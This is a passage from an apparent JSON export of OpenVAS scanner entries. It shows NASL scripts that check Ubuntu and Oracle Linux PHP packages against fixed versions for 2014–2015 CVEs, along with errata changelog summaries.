ver:\"5.5.9+dfsg-1ubuntu4.9\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.5.9+dfsg-1ubuntu4.9\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.5.9+dfsg-1ubuntu4.9\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.3.10-1ubuntu3.18\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.3.10-1ubuntu3.18\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.3.10-1ubuntu3.18\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.3.10-1ubuntu3.18\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.3.2-1ubuntu4.30\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.3.2-1ubuntu4.30\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.3.2-1ubuntu4.30\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:47:45", "references": ["http://linux.oracle.com/errata/ELSA-2015-1053.html"], "pluginID": "1361412562310122869", "description": "Oracle Linux Local Security Checks ELSA-2015-1053", "edition": 4, "reporter": "Eero Volotinen", "published": "2016-02-05T00:00:00", "title": "Oracle Linux Local Check: ELSA-2015-1053", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2348", "CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2014-9427", "CVE-2015-1352", "CVE-2015-2301", "CVE-2014-9709", "CVE-2015-2305", "CVE-2015-0273", "CVE-2014-8142", "CVE-2015-4148", "CVE-2015-4147", "CVE-2015-4600", "CVE-2014-9652", "CVE-2015-1351", "CVE-2015-4599", "CVE-2015-0231"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:1361412562310122869", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122869", "sourceData": "# OpenVAS Vulnerability Test \n# Description: Oracle Linux Local Check \n# $Id: ELSA-2015-1053.nasl 6552 2017-07-06 11:49:41Z cfischer $\n \n# Authors: \n# Eero Volotinen <eero.volotinen@solinor.com> \n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.122869\");\nscript_version(\"$Revision: 6552 $\");\nscript_tag(name:\"creation_date\", value:\"2016-02-05 14:01:38 +0200 (Fri, 05 Feb 2016)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 13:49:41 +0200 (Thu, 06 Jul 2017) $\");\nscript_name(\"Oracle Linux Local Check: ELSA-2015-1053\");\nscript_tag(name: \"insight\", value: \"ELSA-2015-1053 - php55 security and bug fix update - php55[2.0-1]- fix incorrect selinux contexts #1194336php55-php[5.5.21-2.0.1]- add dtrace-utils as build dependency[5.5.21-2]- core: fix use-after-free vulnerability in the process_nested_data function (unserialize) CVE-2015-2787- core: fix NUL byte injection in file name argument of move_uploaded_file() CVE-2015-2348- date: fix use after free vulnerability in unserialize() with DateTimeZone CVE-2015-0273- enchant: fix heap buffer overflow in enchant_broker_request_dict() CVE-2014-9705- ereg: fix heap overflow in regcomp() CVE-2015-2305- opcache: fix use after free CVE-2015-1351- phar: fix use after free in phar_object.c CVE-2015-2301- pgsql: fix NULL pointer dereference CVE-2015-1352- soap: fix type confusion through unserialize #1204868[5.5.21-1]- rebase to PHP 5.5.21[5.5.20-1]- rebase to PHP 5.5.20 #1057089- fix package name in description- php-fpm own session and wsdlcache dir- php-common doesn't provide php-gmp\"); \nscript_tag(name : \"solution\", value : \"update software\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_tag(name : \"summary\", value : \"Oracle Linux Local Security Checks ELSA-2015-1053\");\nscript_xref(name : \"URL\" , value : \"http://linux.oracle.com/errata/ELSA-2015-1053.html\");\nscript_cve_id(\"CVE-2014-9427\",\"CVE-2015-1351\",\"CVE-2015-1352\",\"CVE-2015-2305\",\"CVE-2014-8142\",\"CVE-2014-9652\",\"CVE-2014-9705\",\"CVE-2014-9709\",\"CVE-2015-0231\",\"CVE-2015-0232\",\"CVE-2015-0273\",\"CVE-2015-2301\",\"CVE-2015-2348\",\"CVE-2015-2787\",\"CVE-2015-4147\",\"CVE-2015-4148\",\"CVE-2015-4599\",\"CVE-2015-4600\",\"CVE-2015-4601\");\nscript_tag(name:\"cvss_base\", value:\"10.0\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\");\nscript_category(ACT_GATHER_INFO);\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Oracle Linux Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\nrelease = get_kb_item(\"ssh/login/release\");\nres = \"\";\nif(release == NULL)\n{\n exit(0);\n}\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"php55\", rpm:\"php55~2.0~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php\", rpm:\"php55-php~5.5.21~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-bcmath\", rpm:\"php55-php-bcmath~5.5.21~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-cli\", rpm:\"php55-php-cli~5.5.21~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-common\", rpm:\"php55-php-common~5.5.21~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-dba\", rpm:\"php55-php-dba~5.5.21~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-devel\", rpm:\"php55-php-devel~5.5.21~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-enchant\", rpm:\"php55-php-enchant~5.5.21~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-fpm\", rpm:\"php55-php-fpm~5.5.21~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-gd\", rpm:\"php55-php-gd~5.5.21~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-gmp\", rpm:\"php55-php-gmp~5.5.21~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-intl\", rpm:\"php55-php-intl~5.5.21~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-ldap\", rpm:\"php55-php-ldap~5.5.21~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-mbstring\", rpm:\"php55-php-mbstring~5.5.21~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-mysqlnd\", rpm:\"php55-php-mysqlnd~5.5.21~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-odbc\", rpm:\"php55-php-odbc~5.5.21~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-opcache\", rpm:\"php55-php-opcache~5.5.21~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-pdo\", rpm:\"php55-php-pdo~5.5.21~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-pgsql\", rpm:\"php55-php-pgsql~5.5.21~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-process\", rpm:\"php55-php-process~5.5.21~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-pspell\", rpm:\"php55-php-pspell~5.5.21~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-recode\", rpm:\"php55-php-recode~5.5.21~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-snmp\", rpm:\"php55-php-snmp~5.5.21~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-soap\", rpm:\"php55-php-soap~5.5.21~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-xml\", rpm:\"php55-php-xml~5.5.21~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-xmlrpc\", rpm:\"php55-php-xmlrpc~5.5.21~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-runtime\", rpm:\"php55-runtime~2.0~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-scldevel\", rpm:\"php55-scldevel~2.0~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"php55\", rpm:\"php55~2.0~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php\", rpm:\"php55-php~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-bcmath\", rpm:\"php55-php-bcmath~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-cli\", rpm:\"php55-php-cli~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-common\", rpm:\"php55-php-common~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-dba\", rpm:\"php55-php-dba~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-devel\", rpm:\"php55-php-devel~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-enchant\", rpm:\"php55-php-enchant~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-fpm\", rpm:\"php55-php-fpm~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-gd\", rpm:\"php55-php-gd~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-gmp\", rpm:\"php55-php-gmp~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-imap\", rpm:\"php55-php-imap~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-intl\", rpm:\"php55-php-intl~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-ldap\", rpm:\"php55-php-ldap~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-mbstring\", rpm:\"php55-php-mbstring~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-mysqlnd\", rpm:\"php55-php-mysqlnd~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-odbc\", rpm:\"php55-php-odbc~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-opcache\", rpm:\"php55-php-opcache~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-pdo\", rpm:\"php55-php-pdo~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-pgsql\", rpm:\"php55-php-pgsql~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-process\", rpm:\"php55-php-process~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-pspell\", rpm:\"php55-php-pspell~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-recode\", rpm:\"php55-php-recode~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-snmp\", rpm:\"php55-php-snmp~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-soap\", rpm:\"php55-php-soap~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-tidy\", rpm:\"php55-php-tidy~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-xml\", rpm:\"php55-php-xml~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-php-xmlrpc\", rpm:\"php55-php-xmlrpc~5.5.21~2.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-runtime\", rpm:\"php55-runtime~2.0~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php55-scldevel\", rpm:\"php55-scldevel~2.0~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n\n}\nif (__pkg_match) exit(99); #Not vulnerable\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:50:31", "references": ["http://linux.oracle.com/errata/ELSA-2015-1218.html"], "pluginID": "1361412562310123083", "description": "Oracle Linux Local Security Checks ELSA-2015-1218", "edition": 5, "reporter": "Eero Volotinen", "published": "2015-10-06T00:00:00", "title": "Oracle Linux Local Check: ELSA-2015-1218", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2015-2783", "CVE-2015-3329", "CVE-2015-2301", "CVE-2014-9425", "CVE-2014-9709", "CVE-2015-0273", "CVE-2015-4148", "CVE-2015-3307", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-3411", "CVE-2015-4600", "CVE-2015-4022", "CVE-2015-3412", "CVE-2015-4603", "CVE-2015-4599", "CVE-2015-4598"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:1361412562310123083", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123083", "sourceData": "# OpenVAS Vulnerability Test \n# Description: Oracle Linux Local Check \n# $Id: ELSA-2015-1218.nasl 6560 2017-07-06 11:58:38Z cfischer $\n \n# Authors: \n# Eero Volotinen <eero.volotinen@solinor.com> \n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.123083\");\nscript_version(\"$Revision: 6560 $\");\nscript_tag(name:\"creation_date\", value:\"2015-10-06 13:59:09 +0300 (Tue, 06 Oct 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 13:58:38 +0200 (Thu, 06 Jul 2017) $\");\nscript_name(\"Oracle Linux Local Check: ELSA-2015-1218\");\nscript_tag(name: \"insight\", value: \"ELSA-2015-1218 - php security update - [5.3.3-46]- fix gzfile accept paths with NUL character #1213407- fix patch for CVE-2015-4024[5.3.3-45]- fix more functions accept paths with NUL character #1213407[5.3.3-44]- soap: missing fix for #1222538 and #1204868[5.3.3-43]- core: fix multipart/form-data request can use excessive amount of CPU usage CVE-2015-4024- fix various functions accept paths with NUL character CVE-2015-4026, #1213407- ftp: fix integer overflow leading to heap overflow when reading FTP file listing CVE-2015-4022- phar: fix buffer over-read in metadata parsing CVE-2015-2783- phar: invalid pointer free() in phar_tar_process_metadata() CVE-2015-3307- phar: fix buffer overflow in phar_set_inode() CVE-2015-3329- phar: fix memory corruption in phar_parse_tarfile caused by empty entry file name CVE-2015-4021- soap: more fix type confusion through unserialize #1222538[5.3.3-42]- soap: more fix type confusion through unserialize #1204868[5.3.3-41]- core: fix double in zend_ts_hash_graceful_destroy CVE-2014-9425- core: fix use-after-free in unserialize CVE-2015-2787- exif: fix free on unitialized pointer CVE-2015-0232- gd: fix buffer read overflow in gd_gif.c CVE-2014-9709- date: fix use after free vulnerability in unserialize CVE-2015-0273- enchant: fix heap buffer overflow in enchant_broker_request_dict CVE-2014-9705- phar: use after free in phar_object.c CVE-2015-2301- soap: fix type confusion through unserialize\"); \nscript_tag(name : \"solution\", value : \"update software\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_tag(name : \"summary\", value : \"Oracle Linux Local Security Checks ELSA-2015-1218\");\nscript_xref(name : \"URL\" , value : \"http://linux.oracle.com/errata/ELSA-2015-1218.html\");\nscript_cve_id(\"CVE-2014-9705\",\"CVE-2014-9709\",\"CVE-2015-0232\",\"CVE-2015-0273\",\"CVE-2015-2301\",\"CVE-2015-2783\",\"CVE-2015-2787\",\"CVE-2015-3307\",\"CVE-2015-3329\",\"CVE-2015-3411\",\"CVE-2015-3412\",\"CVE-2015-4021\",\"CVE-2015-4022\",\"CVE-2015-4024\",\"CVE-2015-4026\",\"CVE-2015-4147\",\"CVE-2015-4148\",\"CVE-2015-4598\",\"CVE-2015-4599\",\"CVE-2015-4600\",\"CVE-2015-4601\",\"CVE-2015-4602\",\"CVE-2015-4603\",\"CVE-2014-9425\");\nscript_tag(name:\"cvss_base\", value:\"10.0\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\");\nscript_category(ACT_GATHER_INFO);\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Oracle Linux Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\nrelease = get_kb_item(\"ssh/login/release\");\nres = \"\";\nif(release == NULL)\n{\n exit(0);\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-embedded\", rpm:\"php-embedded~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-enchant\", rpm:\"php-enchant~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-fpm\", rpm:\"php-fpm~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-intl\", rpm:\"php-intl~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-process\", rpm:\"php-process~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-pspell\", rpm:\"php-pspell~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-tidy\", rpm:\"php-tidy~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php-zts\", rpm:\"php-zts~5.3.3~46.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n\n}\nif (__pkg_match) exit(99); #Not vulnerable\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:49:31", "references": ["https://www.redhat.com/archives/rhsa-announce/2015-July/msg00005.html", "2015:1218-01"], "pluginID": "1361412562310871388", "description": "Check the version of php", "edition": 5, 